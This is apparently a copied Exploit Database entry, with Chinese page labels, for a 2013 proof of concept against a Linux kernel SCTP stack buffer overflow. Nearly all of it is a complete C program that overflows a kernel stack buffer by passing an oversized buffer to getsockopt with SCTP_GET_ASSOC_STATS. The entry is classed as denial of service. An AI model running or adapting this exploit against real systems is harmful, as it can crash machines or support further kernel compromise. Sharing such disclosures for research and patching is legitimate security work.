Linux Kernel – ‘SCTP_GET_ASSOC_STATS()’ Stack Buffer Overflow (PoC)

• Exploit Database
• 12 阅读

• 作者： Petr Matousek
  日期： 2013-03-13
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/24747/

• #include <stdio.h>
  #include <string.h>
  #include <netinet/in.h>
  #include <sys/socket.h>
  
  #define SCTP_GET_ASSOC_STATS 112
  #define SOL_SCTP 132
  
  int main(void)
  {
  	char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  	socklen_t len = strlen(buf);
  	int fd;
  
  	fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
  	getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
  	return 0;
  }